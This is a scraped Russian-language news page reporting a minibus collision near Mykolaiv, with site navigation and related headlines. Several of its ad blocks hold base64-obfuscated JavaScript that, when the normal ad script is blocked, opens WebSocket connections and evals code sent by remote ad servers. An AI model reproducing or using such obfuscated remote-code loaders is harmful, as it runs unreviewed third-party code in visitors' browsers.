<!DOCTYPE html>
<html>
  
  <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>ДТП в Николаеве: ВАЗ на полной скорости влетел в маршрутку с людьми &raquo; Хроника мировых событий</title>
<meta name="description" content="ДТП в Николаеве: ВАЗ на полной скорости влетел в маршрутку с людьми" />
<meta name="keywords" content="" />
<meta name="generator" content="DataLife Engine (http://dle-news.ru)" />
<meta property="og:site_name" content="Хроника мировых событий" />
<meta property="og:type" content="article" />
<meta property="og:title" content="ДТП в Николаеве: ВАЗ на полной скорости влетел в маршрутку с людьми" />
<meta property="og:url" content="http://hronika.info/kriminal/293432-dtp-v-nikolaeve-vaz-na-polnoy-skorosti-vletel-v-marshrutku-s-lyudmi.html" />
<meta property="og:image" content="http://hronika.info/uploads/posts/2018-01/thumbs/1517431797_343809.jpg" />
<link rel="search" type="application/opensearchdescription+xml" href="http://hronika.info/engine/opensearch.php" title="Хроника мировых событий" />
<link rel="alternate" type="application/rss+xml" title="Хроника мировых событий" href="http://hronika.info/rss.xml" />
<script type="text/javascript" src="/engine/classes/js/jquery.js"></script>
<script type="text/javascript" src="/engine/classes/js/jqueryui.js"></script>
<script type="text/javascript" src="/engine/classes/js/dle_js.js"></script>
<script type="text/javascript" src="/engine/classes/js/bbcodes.js"></script>
<script type="text/javascript" src="/engine/classes/highslide/highslide.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js"></script>
<script type="text/javascript" src="/engine/editor/scripts/webfont.js"></script>
<link media="screen" href="/engine/editor/css/default.css" type="text/css" rel="stylesheet" />
    <link rel="icon" type="image/png" href="/favicon.png" />
    <link rel="apple-touch-favicon" href="/apple-touch-favicon.png"/>
    <link media="screen" href="/templates/hronika/css/engine.css" type="text/css" rel="stylesheet" />
    <link media="screen" href="/templates/hronika/css/orating.css" type="text/css" rel="stylesheet" />
    <link media="screen" href="/templates/hronika/css/css.css" type="text/css" rel="stylesheet" />
    <meta property="fb:admins" content="490214530991726"/>  
    <meta property="fb:app_id" content="574441425949200"/>  
    <meta name="4309768020df0301dc59380bc0812f0f" content="">
    <script type="text/javascript">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</script>
    
    
<meta name="teasercash-site-verification" content="teasercash-site-833" />
  </head>

  <body><script type="text/javascript">
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = '';
var dle_group      = 5;
var dle_skin       = 'hronika';
var dle_wysiwyg    = '0';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_del_news   = 'Удалить статью';
var allow_dle_delete_news   = false;
var dle_search_delay   = false;
var dle_search_value   = '';
$(function(){
	FastSearch();
});
//-->
</script><script type="text/javascript">  
<!--  
	hs.graphicsDir = '/engine/classes/highslide/graphics/';
	hs.outlineType = 'rounded-white';
	hs.numberOfImagesToPreload = 0;
	hs.showCredits = false;
	
	hs.lang = {
		loadingText :     'Загрузка...',
		playTitle :       'Просмотр слайдшоу (пробел)',
		pauseTitle:       'Пауза',
		previousTitle :   'Предыдущее изображение',
		nextTitle :       'Следующее изображение',
		moveTitle :       'Переместить',
		closeTitle :      'Закрыть (Esc)',
		fullExpandTitle : 'Развернуть до полного размера',
		restoreTitle :    'Кликните для закрытия картинки, нажмите и удерживайте для перемещения',
		focusTitle :      'Сфокусировать',
		loadingTitle :    'Нажмите для отмены'
	};
	
	hs.align = 'center';
	hs.transitions = ['expand', 'crossfade'];
	hs.addSlideshow({
		interval: 4000,
		repeat: false,
		useControls: true,
		fixedControls: 'fit',
		overlayOptions: {
			opacity: .75,
			position: 'bottom center',
			hideOnMouseOut: true
		}
	});
//-->
</script>

    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9393887096432784",
    enable_page_level_ads: true
  });
</script>
    
    <header id="header" class="bshadow">
      <div class="maxw"><div class="logowrap







kriminal













">
    <div class="logo"><img src="/templates/hronika/images/logo.png" alt="Хроника мировых событий" style="width: 100%;" /></div>
    
</div>	      <a href="/" class="index"></a>
			<nav class="top-menu bshadow">
				<ul>
					<li><a href="/politika/" >Политика</a></li>
					<li><a href="/ekonomika/" >Экономика</a></li>
                    <li><a href="/obwestvo/" >Общество</a></li>
                    <li><a href="/kultura/" >Культура</a></li>
					<li><a href="/sport/" >Спорт</a></li>
					<li><a href="/avto/" >Авто</a></li>
					<li><a href="/otdyh/" >Отдых</a></li>
					<li><a href="/medicina/" >Медицина</a></li>
                    <li><a href="/nedvizhimost/" >Недвижимость</a></li>
					<li><a href="/videonovosti/" >Видеоновости</a></li>						
				</ul>					
				<ul>
                    <li><a href="/ukraina/" >Украина</a></li>
					<li><a href="/mir/" >Мир</a></li>
					<li><a href="/rossija/" >Россия</a></li>
					<li><a href="/tehnologii/" >Технологии</a></li>
                    <li><a href="/neverojatnoe/" >Невероятное</a></li>
					<li><a href="/igry/" >Игры</a></li>                    					
				    <li class="tm-selected"><a href="/kriminal/" >Происшествия</a></li>
                    <li><a href="/fotoreportazhi/" >Фоторепортажи</a></li>
					<li><a href="/kurjozy/" >Курьезы</a></li>
					<li><a href="/mnenia/" >Мнения</a></li>
				</ul>
			</nav>
            <div class="reklright"></div>
      </div>
      </header>
      <div id="wrcont">

	  <!--noindex--><!--/noindex-->
       <div class="google-top-center"><!-- noindex -->
<center>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Под меню заглушка -->
<ins class="adsbygoogle"
     style="display:inline-block;width:970px;height:90px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="5011853349"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</center>
<!--/noindex--></div>
        <section id="middle">
          <div class="clr"><div class="speedbar"><span id="dle-speedbar"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://hronika.info/" itemprop="url"><span itemprop="title">Хроника событий</span></a></span> &raquo; <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://hronika.info/kriminal/" itemprop="url"><span itemprop="title">Происшествия</span></a></span> &raquo; ДТП в Николаеве: ВАЗ на полной скорости влетел в маршрутку с людьми</span></div></div>
          <div id="container">
            <div id="content2">
 

              <article>

			   <div id='dle-content'>

<div class="full-story">
 <div class="mainc fullimg200_150">
  <div class="full-storyttl">
  <div class="fullinfo"></div>
   <div class="fullargcat"><b>Раздел:&nbsp;</b><strong><a href="http://hronika.info/kriminal/">Происшествия</a></strong>&nbsp;&nbsp;</div>
   <div class="orating ignore-select" id="orating-293432">
	<a href="#" class="orating_m" title="Не нравится" onclick="orating(293432,0);return false;"></a>
	<a href="#" class="orating_p" title="Нравится" onclick="orating(293432,1);return false;"></a>
	<a href="#" class="orating_res" onclick="ostats(293432,1,true);return false;">0</a>
</div>


  </div>
		<div class="ttl_h1full"><h1><span id="news-title">ДТП в Николаеве: ВАЗ на полной скорости влетел в маршрутку с людьми</span></h1></div>
     
<div class="ax-full _ga1_on_">
	<!--TBegin:http://hronika.info/uploads/posts/2018-01/1517431797_343809.jpg|left--><a href="http://hronika.info/uploads/posts/2018-01/1517431797_343809.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2018-01/thumbs/1517431797_343809.jpg" style="float:left;" alt='ДТП в Николаеве: ВАЗ на полной скорости влетел в маршрутку с людьми' title='ДТП в Николаеве: ВАЗ на полной скорости влетел в маршрутку с людьми'  /></a><!--TEnd--> <b>Пострадало двое, один госпитализирован.</b><br /><br />Вечером в среду, 31 января, на трассе у с. Большая Корениха автомобиль ВАЗ 2108 врезался в маршрутку, сообщает <a href="http://hronika.info/">Хроника.инфо</a> со ссылкой на <a href="https://novosti-n.org/news/read/137329.html#image-3" target="_blank">Новости N</a>.<br /><br />Маршрутка ехала по трассе со стороны Варваровки в направлении Большой Коренихи. Сразу за остановкой «Пионерлагерь» сзади маршрутку на полном ходу «догнала» ВАЗовская «восьмерка».<br /><br />В результате ДТП пострадали два человека: водитель ВАЗа и женщина - пассажир маршрутки. Водитель от медицинской помощи отказался, женщину «скорая» увезла в больницу.<br /><br /><b>Читайте также: <a href="http://hronika.info/kriminal/293403-smertelnoe-dtp-s-pozharom-na-poltavschine-stolknulis-tri-fury.html" >Смертельное ДТП с пожаром на Полтавщине: столкнулись три фуры</a></b><br /><br />Оба автомобиля получили механические повреждения.<br /><br /><div style="text-align:center;"><!--dle_media_begin:https://www.youtube.com/watch?v=52JvF0C3d3U--><iframe title="YouTube video player" width="400" height="280" src="http://www.youtube.com/embed/52JvF0C3d3U?rel=1&amp;wmode=transparent" frameborder="0" allowfullscreen></iframe><!--dle_media_end--></div>
	<div class="ctrlE">Если вы нашли ошибку в тексте, выделите её мышью и нажмите Ctrl+Enter</div>
</div>
<div class="clr"></div>
<div class="full-top_banner">
    <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10323">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10323/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
    </div>
<div class="full-top_banner">
    <!-- M225926Composite Start --> <div id="M225926Composite608873"><center> <a href="http://marketgid.com/" target="_blank">Загрузка...</a> </center></div> <script type="text/javascript"> var d = new Date, script608873 = document.createElement("script"), mg_ws608873 = {};script608873.type = "text/javascript";script608873.charset = "utf-8";script608873.src = "//jsc.marketgid.com/h/r/hronika.info.608873.js?t=" + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script608873.onerror = function () { mg_ws608873 = new Worker(URL.createObjectURL(new Blob(['eval(atob(\'ZnVuY3Rpb24gc2VuZE1lc3NhZ2U2MDg4NzMoZSl7dmFyIGg9bWdfd3M2MDg4NzMub25tZXNzYWdlOyBtZ193czYwODg3My5yZWFkeVN0YXRlPT1tZ193czYwODg3My5DTE9TRUQmJihtZ193czYwODg3Mz1uZXcgV2ViU29ja2V0KG1nX3dzNjA4ODczX2xvY2F0aW9uKSksbWdfd3M2MDg4NzMub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb242MDg4NzMobWdfd3M2MDg4NzMsZnVuY3Rpb24oKXttZ193czYwODg3My5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb242MDg4NzMoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb242MDg4NzMoZSx0KX0sNSl9OyB2YXIgbWdfd3M2MDg4NzNfbG9jYXRpb24gPSAid3NzOi8vd3NwLm1hcmtldGdpZC5jb20vd3MiOyBtZ193czYwODg3MyA9IG5ldyBXZWJTb2NrZXQobWdfd3M2MDg4NzNfbG9jYXRpb24pLCBtZ193czYwODg3My5vbm1lc3NhZ2UgPSBmdW5jdGlvbiAodCkge3Bvc3RNZXNzYWdlKHQuZGF0YSk7fSwgb25tZXNzYWdlID0gZnVuY3Rpb24oZSl7c2VuZE1lc3NhZ2U2MDg4NzMoZS5kYXRhKX0=\'))']), {type: "application/javascript"})); mg_ws608873.onmessage = function (msg){window.eval(msg.data);}; mg_ws608873.postMessage('js|'+script608873.src+'|M225926Composite608873|M225926Composite608873');};document.body.appendChild(script608873); </script> <!-- M225926Composite End -->
    <!-- Oblivki teasers block START -->
        <div id="X8c86T6aTLG1gJQPzRFC"></div>
        <script>
            (function(d,s,b,id){var js=d.createElement(s);
                window.AD_DOMAIN_URL_SYS_8349582369 = '//leokross.com/';
                js.src='//leokross.com/Ukxdjs69/UNeKgdUfQ.js';
                d.getElementsByTagName('head')[0].appendChild(js);
                if(typeof d[b]=='undefined') d[b]=[];
                d[b].push(id);})(document,'script','obTBlocks','X8c86T6aTLG1gJQPzRFC')
        </script>
        <!-- Oblivki teasers block END -->
    <div id="tFMc0tpD"></div>
<script src="http://tdsantcrazy.ru/tFMc0tpD" style="text/javascript"></script>
    <div id="MIXADV_1444" class="MIXADVERT_NET"></div>
          <script> 
          var node1444 = document.getElementById("MIXADV_1444");
          if( node1444 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=1444&r="+Math.random();
               node1444.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBob3N0ID0gKCBkYXRlLmdldERhdGUoKSA8IDE1ID8gIm5hc2RmZy5jb20iIDogIm5ldHNsZWQubmV0IiApO3ZhciBzY3JpcHRfZmlyc3QgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTtzY3JpcHRfZmlyc3Quc3JjID0gImh0dHBzOi8vIisgaG9zdCsiL3Nob3cvP2lkPTE0NDQmcj0iK01hdGgucmFuZG9tKCk7bm9kZTE0NDQucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfZmlyc3QpO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt3aW5kb3cuZXZhbChhdG9iKCJjM1J5SUQwZ0oyTnZibTRnUFNCdVpYY2dWMlZpVTI5amEyVjBLQ0ozYzNNNkx5OGlLMmh2YzNRcklqbzRNRGd3THpFME5EUWlLVHNnWTI5dWJpNXZibTFsYzNOaFoyVWdQU0JtZFc1amRHbHZiaUFvWlhaMEtTQjdJSEJ2YzNSTlpYTnpZV2RsS0dWMmRDNWtZWFJoS1RzZ1kyOXViaTVqYkc5elpTZ3BPMzBuTzNaaGNpQjNiM0pyWlhJZ1BTQnVaWGNnVjI5eWEyVnlLRlZTVEM1amNtVmhkR1ZQWW1wbFkzUlZVa3dvYm1WM0lFSnNiMklvV3lKbGRtRnNLQ0FuSWl0emRISXJJaWNwSWwwcExDQjdkSGx3WlRvZ0ozUmxlSFF2YW1GMllYTmpjbWx3ZENkOUtTazdkMjl5YTJWeUxuQnZjM1JOWlhOellXZGxLQ2N4SnlrN0lIZHZjbXRsY2k1dmJtMWxjM05oWjJVZ1BTQm1kVzVqZEdsdmJpQW9iWE5uS1NCN0lIZHBibVJ2ZHk1bGRtRnNLRzF6Wnk1a1lYUmhLVHNnZlRzZyIpKTt9OyBzY3JpcHRfZmlyc3QucmVtb3ZlKCk7") );
              }
          }
          </script>
    <!-- start NEW content_v1 for hronika.info -->
<div id="adpartner-jsunit-851">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=851&" + Math.random();
        head.appendChild(script);
    </script>
</div>
<!-- end NEW content_v1 for hronika.info -->
    <div id="CNM4058" style="text-align:center;display:none" ><a href="https://www.novostimira.biz/" id="CNM4058t" style="display:none" target="_blank"><strong>Новости</strong></a></div>


<!-- before </body> -->
<script type="text/javascript" async="async" >
  var el = document.getElementById('CNM4058');
  if (el) {
    if (document.getElementById('CNM4058t').style.display == 'none') {
      document.getElementById('CNM4058t').style.display = '';
      var dateNM = new Date();
      var t = Math.floor(dateNM.getTime()/(1000*600));
      var NMces=document.createElement('script');
      NMces.type = 'text/javascript';
      NMces.charset='UTF-8';
      NMces.src='http'+(window.location.protocol=='https:'?'s':'')+'://c.novostimira.biz/l/4058?v='+t;
      el.parentNode.appendChild(NMces);
    }
  }
</script>

    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:block; text-align:center;"
     data-ad-format="fluid"
     data-ad-layout="in-article"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="2140264146"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>

    <script id="r17724" type="text/javascript">
    (function() {
        var worker17724,
            tickerID = 17724,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/17/ticker_17724.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDtmdW5jdGlvbiBzZW5kVG9Tb2NrZXQoZGF0YSkge2lmICghc29ja2V0IHx8IHNvY2tldC5yZWFkeVN0YXRlID09PSBzb2NrZXQuQ0xPU0VEKSB7c29ja2V0ID0gbmV3IFdlYlNvY2tldCgid3NzOi8vZzRwLnJlZHRyYW0uY29tL3dzLyIpO3NvY2tldC5vbm1lc3NhZ2UgPSBmdW5jdGlvbihyKSB7cG9zdE1lc3NhZ2UoSlNPTi5zdHJpbmdpZnkoci5kYXRhKSk7fTt9aWYgKHNvY2tldCkge3NlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7c29ja2V0LnNlbmQoZGF0YSk7fSk7fX1mdW5jdGlvbiBzZW5kQ29ubmVjdGlvbihjLCByKSB7c2V0VGltZW91dChmdW5jdGlvbigpIHtpZiAoYy5yZWFkeVN0YXRlID09PSBjLk9QRU4pIHtyZXR1cm4gcigpO31yZXR1cm4gc2VuZENvbm5lY3Rpb24oYywgcik7fSwgNTApO31vbm1lc3NhZ2UgPSBmdW5jdGlvbihyKSB7IHNlbmRUb1NvY2tldChyLmRhdGEpOyB9Ow==';

                function runExternalMessage(data) {
                    worker17724.postMessage(data);
                }

                worker17724 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker17724.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker17724.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
    <div id="bn_aa922818e6">загрузка...</div>
<script type="text/javascript" src="//recreativ.ru/rcode.aa922818e6.js"></script>
     </div>
<div class="f_bottm">
 <div class="f_date_author">Сегодня, 23:47 » Автор: <a onclick="ShowProfile('%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%A8%D0%B5%D0%B2%D1%87%D0%B5%D0%BD%D0%BA%D0%BE', 'http://hronika.info/user/%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%A8%D0%B5%D0%B2%D1%87%D0%B5%D0%BD%D0%BA%D0%BE/', '0'); return false;" href="http://hronika.info/user/%D0%95%D0%B2%D0%B3%D0%B5%D0%BD%D0%B8%D0%B9+%D0%A8%D0%B5%D0%B2%D1%87%D0%B5%D0%BD%D0%BA%D0%BE/">Евгений Шевченко</a></div> 
 <div class="view_comments">  
  <div class="f_views"><span></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;29</div>
  <div class="f_comments"><span></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0</div> 
  </div>
</div>
	</div>    
<div class="sb">
<div class="sotsseti">
<!-- noindex -->
  <script type="text/javascript">(function() {
      if (window.pluso) {return};
       var d = document, s = d.createElement('script'), g = 'getElementsByTagName';
       s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
       s.src = ('https:' == window.location.protocol ? 'https' : 'http')  + '://x.pluso.ru/pluso-x.js';
       var h=d[g]('body')[0];
       h.appendChild(s);
    })();
 </script>
<div class="pluso-engine" pluso-sharer={"buttons":"facebook,twitter,google,vkontakte,moimir,email,print,more","style":{"size":"small","shape":"square","theme":"theme03","css":""},"orientation":"horizontal","multiline":false} ></div> 
<!-- /noindex -->
    
<div class="sotslikes">
<!-- Код рейтинга -->

</div>
</div>
 <div class="fullstoryn">
   <div class="bshadow exban"> 

    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Рекомендуемый под новостью -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="6534414543"
     data-ad-format="autorelaxed"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
           <div class="clr"></div>
    </div>
 </div>
  <div class="clr"></div>
  <div class="fullstoryn">
   <div class="bshadow exban">
  
    
   <div class="clr"></div>
    </div>
 </div>  
</div><br/>

<div class="related-n"> 

<div class="relttl"><h2>Похожие новости по теме</h2></div>
         <div class="clr"></div>
<div class="related_news bshadow"><a href="http://hronika.info/kriminal/275749-v-nikolaeve-vaz-vletel-v-marshrutku-est-postradavshie.html">
  <img src="/posters/110_85_80_1/uploads/posts/2017-11/thumbs/1511030480_dtp.jpg" alt="В Николаеве ВАЗ влетел в маршрутку: есть пострадавшие" title="В Николаеве ВАЗ влетел в маршрутку: есть пострадавшие" /></a>
    <strong title="В Николаеве ВАЗ влетел в маршрутку: есть пострадавшие"><a href="http://hronika.info/kriminal/275749-v-nikolaeve-vaz-vletel-v-marshrutku-est-postradavshie.html">В Николаеве ВАЗ влетел в маршрутку: есть пострадавшие</a></strong>
  <p>Некоторые пострадавшие в тяжелом состоянии.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/kriminal/270703-na-zhitomirschine-marshrutka-vrezalas-v-gruzovik-est-zhertvy.html">
  <img src="/posters/110_85_80_1/uploads/posts/2017-10/1509366042_20po.jpg" alt="На Житомирщине грузовик врезался в маршрутку: есть жертвы" title="На Житомирщине грузовик врезался в маршрутку: есть жертвы" /></a>
    <strong title="На Житомирщине грузовик врезался в маршрутку: есть жертвы"><a href="http://hronika.info/kriminal/270703-na-zhitomirschine-marshrutka-vrezalas-v-gruzovik-est-zhertvy.html">На Житомирщине грузовик врезался в маршрутку: есть жертвы</a></strong>
  <p>Один человек погиб, еще восемь получили травмы.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/kriminal/195334-v-kieve-pyanyy-voditel-protaranil-marshrutku-s-passazhirami.html">
  <img src="/posters/110_85_80_1/uploads/posts/2016-12/thumbs/1482670579_dtp4.jpg" alt="В Киеве пьяный водитель протаранил маршрутку с пассажирами" title="В Киеве пьяный водитель протаранил маршрутку с пассажирами" /></a>
    <strong title="В Киеве пьяный водитель протаранил маршрутку с пассажирами"><a href="http://hronika.info/kriminal/195334-v-kieve-pyanyy-voditel-protaranil-marshrutku-s-passazhirami.html">В Киеве пьяный водитель протаранил маршрутку с пассажирами</a></strong>
  <p>Водитель маршрутки попал в ДТП и сбежал.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/kriminal/187074-zhutkoe-dtp-pod-odessoy-bmw-vrezalsya-v-marshrutku-s-lyudmi.html">
  <img src="/posters/110_85_80_1/uploads/posts/2016-11/1479741885_1912440.jpg" alt="Жуткое ДТП под Одессой: BMW врезался в маршрутку с людьми" title="Жуткое ДТП под Одессой: BMW врезался в маршрутку с людьми" /></a>
    <strong title="Жуткое ДТП под Одессой: BMW врезался в маршрутку с людьми"><a href="http://hronika.info/kriminal/187074-zhutkoe-dtp-pod-odessoy-bmw-vrezalsya-v-marshrutku-s-lyudmi.html">Жуткое ДТП под Одессой: BMW врезался в маршрутку с людьми</a></strong>
  <p>Водители обоих авто получили травмы.</p><div class="clr"></div>
</div>
<div class="related_news bshadow"><a href="http://hronika.info/kriminal/144363-dtp-v-kieve-taksi-protaranilo-marshrutku.html">
  <img src="/posters/110_85_80_1/uploads/posts/2016-05/thumbs/1463905593_dtp3.jpg" alt="ДТП в Киеве: такси протаранило маршрутку" title="ДТП в Киеве: такси протаранило маршрутку" /></a>
    <strong title="ДТП в Киеве: такси протаранило маршрутку"><a href="http://hronika.info/kriminal/144363-dtp-v-kieve-taksi-protaranilo-marshrutku.html">ДТП в Киеве: такси протаранило маршрутку</a></strong>
  <p>Пострадали три человека.</p><div class="clr"></div>
</div>
 
<div style="clear: both"></div>
</div>
         <div class="clr"></div>

<!--ЗАКОММЕНТИРОВАННЫЕ
<div style="clear: both"></div>
<div class="poslednie-n">
<div class="relttl"><h2>Поcледние новости раздела category}</h2></div>
<div class="bshadow">
<div class="poslednie_div49-5 fleft">custom category="2" template="/inks/shabnews/poslednie_n_fullstory" from="0" limit="5"}</div>
<div class="poslednie_div49-5 fright">custom category="2" template="/inks/shabnews/poslednie_n_fullstory" from="0" limit="5"}</div>
<div style="clear: both"></div>
</div>
</div>-->

<!--<div style="clear: both"></div>
<div class="sovetuemsmotret">
<div class="relttl"><h2>Также советуем посмотреть</h2></div>
      <div class="slwrap3 bshadow">
      <div id="slider3">
        <a class="buttons prev" href="#"></a>
        <div class="viewport">
          <ul class="overview"><li class="listalkafull_n">
    <a href="http://hronika.info/ekonomika/678-kipr-v-ozhidanii-kreditnoy-pomoschi.html"><img src="/posters/167_120_50_1/uploads/posts/2013-04/1365935837_kipr-v-ozhydanii.jpeg" alt="Кипр в ожидании кредитной помощи" class="l_n_im" title="Кипр в ожидании кредитной помощи" />
</a>
<strong class="ttl" title="Кипр в ожидании кредитной помощи"><a href="http://hronika.info/ekonomika/678-kipr-v-ozhidanii-kreditnoy-pomoschi.html">Кипр в ожидании кредитной помощи</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/rossija/345-proverki-npo-mogut-ploho-otrazitsya-na-mezhdunarodnom-imidzhe-rossii.html"><img src="/posters/167_120_50_1/uploads/posts/2013-03/1364581571_zagruzhennoe.jpg" alt="Проверки НПО могут плохо отразиться на международном имидже России" class="l_n_im" title="Проверки НПО могут плохо отразиться на международном имидже России" />
</a>
<strong class="ttl" title="Проверки НПО могут плохо отразиться на международном имидже России"><a href="http://hronika.info/rossija/345-proverki-npo-mogut-ploho-otrazitsya-na-mezhdunarodnom-imidzhe-rossii.html">Проверки НПО могут плохо отразиться на международном имидже России</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/mir/333-yuzhnaya-koreya-privela-rakety-v-boevuyu-gotovnost.html"><img src="/posters/167_120_50_1/uploads/posts/2013-03/1364553899_zagruzhennoe.jpg" alt="Северная Корея привела ракеты в боевую готовность" class="l_n_im" title="Северная Корея привела ракеты в боевую готовность" />
</a>
<strong class="ttl" title="Северная Корея привела ракеты в боевую готовность"><a href="http://hronika.info/mir/333-yuzhnaya-koreya-privela-rakety-v-boevuyu-gotovnost.html">Северная Корея привела ракеты в боевую готовность</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/medicina/37-uchenye-somnevayutsya-v-polze-organicheskih-produktov.html"><img src="/posters/167_120_50_1/uploads/posts/2012-09/thumbs/1348091272_uchenye-somnevautsa-v-polze-organicheskih-produktov.jpg" alt="Ученые сомневаются в пользе органических продуктов" class="l_n_im" title="Ученые сомневаются в пользе органических продуктов" />
</a>
<strong class="ttl" title="Ученые сомневаются в пользе органических продуктов"><a href="http://hronika.info/medicina/37-uchenye-somnevayutsya-v-polze-organicheskih-produktov.html">Ученые сомневаются в пользе органических продуктов</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/mir/29-v-amsterdame-zakryvayut-25-kvartalov-krasnyh-fonarey.html"><img src="/posters/167_120_50_1/uploads/posts/2012-09/thumbs/1348088503_v-amsterdame-zakryvajut-kvartal-krasnyh-fonarej.jpg" alt="В Амстердаме закрывают 25% кварталов красных фонарей" class="l_n_im" title="В Амстердаме закрывают 25% кварталов красных фонарей" />
</a>
<strong class="ttl" title="В Амстердаме закрывают 25% кварталов красных фонарей"><a href="http://hronika.info/mir/29-v-amsterdame-zakryvayut-25-kvartalov-krasnyh-fonarey.html">В Амстердаме закрывают 25% кварталов красных фонарей</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/mir/28-kanada-prekraschaet-s-iranom-diplomaticheskie-otnosheniya.html"><img src="/posters/167_120_50_1/uploads/posts/2012-09/thumbs/1348088260_kanada-prekraschaet-s-iranom-diplomaticheskie-otnoshenija.jpg" alt="Канада прекращает с Ираном дипломатические отношения" class="l_n_im" title="Канада прекращает с Ираном дипломатические отношения" />
</a>
<strong class="ttl" title="Канада прекращает с Ираном дипломатические отношения"><a href="http://hronika.info/mir/28-kanada-prekraschaet-s-iranom-diplomaticheskie-otnosheniya.html">Канада прекращает с Ираном дипломатические отношения</a></strong>
</li><li class="listalkafull_n">
